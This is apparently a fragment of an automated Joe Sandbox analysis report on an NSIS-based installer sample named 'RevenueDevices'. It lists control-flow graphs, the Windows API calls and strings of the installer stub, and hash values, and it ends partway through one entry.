403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                        APIs
                                        • #17.COMCTL32 ref: 004038A2
                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                        • OleInitialize.OLE32(00000000), ref: 004038B4
                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                        • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                        • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                        • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                        • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                        • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                        • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                        • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                        • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                        • CoUninitialize.COMBASE(?), ref: 00403AD1
                                        • ExitProcess.KERNEL32 ref: 00403AF1
                                        • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                        • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                        • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                        • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                        • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                        • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                        • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                        • API String ID: 2435955865-239407132
                                        • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                        • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                        • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                        • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                        • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                        • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                        • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                        APIs
                                        • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                        • FindClose.KERNEL32(00000000), ref: 004062EC
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                        • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                        • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                        • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                        • GetClientRect.USER32(?,?), ref: 00405196
                                        • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                        • ShowWindow.USER32(?,00000008), ref: 0040523A
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                        • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                          • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                        • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                        • ShowWindow.USER32(00000000), ref: 004052E7
                                        • ShowWindow.USER32(?,00000008), ref: 004052EC
                                        • ShowWindow.USER32(00000008), ref: 00405333
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                        • CreatePopupMenu.USER32 ref: 00405376
                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                        • GetWindowRect.USER32(?,?), ref: 0040539E
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                        • OpenClipboard.USER32(00000000), ref: 0040540B
                                        • EmptyClipboard.USER32 ref: 00405411
                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                        • GlobalLock.KERNEL32(00000000), ref: 00405427
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                        • CloseClipboard.USER32 ref: 0040546E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                        • String ID: @rD$New install of "%s" to "%s"${
                                        • API String ID: 2110491804-2409696222
                                        • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                        • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                        • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                        • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                        • ShowWindow.USER32(?), ref: 004054D2
                                        • DestroyWindow.USER32 ref: 004054E6
                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                        • GetDlgItem.USER32(?,?), ref: 00405523
                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                        • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                        • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                        • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                        • GetDlgItem.USER32(?,00000003), ref: 00405708
                                        • ShowWindow.USER32(00000000,?), ref: 0040572A
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                        • EnableWindow.USER32(?,?), ref: 00405757
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                        • EnableMenuItem.USER32(00000000), ref: 00405774
                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                        • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                        • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                        • ShowWindow.USER32(?,0000000A), ref: 00405910
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID: @rD
                                        • API String ID: 3282139019-3814967855
                                        • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                        • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                        • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                        • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-401870 call 404f72 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 281 401875-40188b call 406009 SetCurrentDirectoryW 268->281 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 281->160 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                        APIs
                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                        • ShowWindow.USER32(?), ref: 00401753
                                        • ShowWindow.USER32(?), ref: 00401767
                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                        • SetCurrentDirectoryW.KERNEL32(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                        Strings
                                        • Rename on reboot: %s, xrefs: 00401943
                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                        • detailprint: %s, xrefs: 00401679
                                        • Rename: %s, xrefs: 004018F8
                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                        • SetFileAttributes failed., xrefs: 004017A1
                                        • Sleep(%d), xrefs: 0040169D
                                        • Rename failed: %s, xrefs: 0040194B
                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                        • Aborting: "%s", xrefs: 0040161D
                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                        • BringToFront, xrefs: 004016BD
                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                        • Jump: %d, xrefs: 00401602
                                        • Call: %d, xrefs: 0040165A
                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
